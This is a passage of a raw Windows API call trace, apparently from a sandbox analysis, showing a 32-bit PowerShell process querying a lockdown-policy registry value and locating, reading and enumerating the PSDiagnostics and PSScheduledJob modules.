dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0154.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d010 | out: phkResult=0x5a0d010*=0x554) returned 0x0 [0154.234] RegQueryValueExW (in: hKey=0x554, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0d02c, lpData=0x0, lpcbData=0x5a0d028*=0x0 | out: lpType=0x5a0d02c*=0x0, lpData=0x0, lpcbData=0x5a0d028*=0x0) returned 0x2 [0154.234] RegCloseKey (hKey=0x554) returned 0x0 [0154.234] CloseHandle (hObject=0x550) returned 1 [0154.236] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\en-US\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\en-us\\psdiagnostics.psd1")) returned 0xffffffff [0154.236] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\en\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\en\\psdiagnostics.psd1")) returned 0xffffffff [0154.240] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.253] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.261] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.268] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.276] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.283] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.290] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.297] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.309] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.316] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.327] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.334] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.343] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.352] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics")) returned 0xffffffff [0154.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0154.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0154.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0154.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x55 [0154.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSGetModuleInfo.xml", nBufferLength=0x55, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x54 [0154.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c59c) returned 1 [0154.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x5a0c860 | out: lpFileInformation=0x5a0c860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c598) returned 1 [0154.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0154.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics", nBufferLength=0x4f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics", lpFilePart=0x0) returned 0x4e [0154.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c49c) returned 1 [0154.362] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0c760 | out: lpFileInformation=0x5a0c760*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c498) returned 1 [0154.368] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psm1")) returned 0x20 [0154.376] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psm1")) returned 0x20 [0154.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", lpFilePart=0x0) returned 0x53 [0154.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c01c) returned 1 [0154.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psm1"), fInfoLevelId=0x0, lpFileInformation=0x2696a68 | out: lpFileInformation=0x2696a68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8d7c)) returned 1 [0154.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c018) returned 1 [0154.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", lpFilePart=0x0) returned 0x53 [0154.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c1c0) returned 1 [0154.377] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x55c [0154.377] GetFileType (hFile=0x55c) returned 0x1 [0154.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c1bc) returned 1 [0154.377] GetFileType (hFile=0x55c) returned 0x1 [0154.378] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x0 [0154.378] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x1000, lpOverlapped=0x0) returned 1 [0154.392] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x1000 [0154.392] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x1000, lpOverlapped=0x0) returned 1 [0154.457] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x2000 [0154.457] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x1000, lpOverlapped=0x0) returned 1 [0154.457] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x3000 [0154.457] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x1000, lpOverlapped=0x0) returned 1 [0154.458] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x4000 [0154.458] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x1000, lpOverlapped=0x0) returned 1 [0154.459] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x5000 [0154.459] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x1000, lpOverlapped=0x0) returned 1 [0154.459] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x6000 [0154.459] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x1000, lpOverlapped=0x0) returned 1 [0154.459] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x7000 [0154.459] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x1000, lpOverlapped=0x0) returned 1 [0154.460] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x8000 [0154.460] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0xd7c, lpOverlapped=0x0) returned 1 [0154.460] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x8d7c [0154.460] ReadFile (in: hFile=0x55c, lpBuffer=0x2696d60, nNumberOfBytesToRead=0x284, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2696d60*, lpNumberOfBytesRead=0x5a0c228*=0x0, lpOverlapped=0x0) returned 1 [0154.460] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0c1fc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0c1fc*=0) returned 0x8d7c [0154.460] ReadFile (in: hFile=0x55c, lpBuffer=0x2697850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0c228, lpOverlapped=0x0 | out: lpBuffer=0x2697850*, lpNumberOfBytesRead=0x5a0c228*=0x0, lpOverlapped=0x0) returned 1 [0154.461] CloseHandle (hObject=0x55c) returned 1 [0154.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", lpFilePart=0x0) returned 0x53 [0154.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0bf80) returned 1 [0154.470] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psm1"), fInfoLevelId=0x0, lpFileInformation=0x26e787c | out: lpFileInformation=0x26e787c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8d7c)) returned 1 [0154.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0bf7c) returned 1 [0154.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0154.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0dbb0) returned 1 [0154.471] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x26e8b30 | out: lpFileInformation=0x26e8b30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x266)) returned 1 [0154.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0dbac) returned 1 [0154.472] EtwEventActivityIdControl () returned 0x0 [0154.472] SetEvent (hEvent=0x544) returned 1 [0154.472] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5a0e390*=0x544, lpdwindex=0x5a0e1b4 | out: lpdwindex=0x5a0e1b4) returned 0x0 [0154.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0154.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0154.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e270) returned 1 [0154.472] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x26ea384 | out: lpFileInformation=0x26ea384*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8100bf6e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c28927f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c28927f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x266)) returned 1 [0154.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e26c) returned 1 [0154.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0154.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0154.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0154.473] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4f8 [0154.473] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.473] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904e3860, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x904e3860, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1f06, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob.Format.ps1xml", cAlternateFileName="")) returned 1 [0154.473] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905a1f40, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x905a1f40, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob.psd1", cAlternateFileName="")) returned 1 [0154.473] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f73a00, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90f73a00, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9be, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob.types.ps1xml", cAlternateFileName="")) returned 1 [0154.473] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f73a00, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x90f73a00, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9be, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob.types.ps1xml", cAlternateFileName="")) returned 0 [0154.474] FindClose (in: hFindFile=0x5bfe4f8 | out: hFindFile=0x5bfe4f8) returned 1 [0154.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0154.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 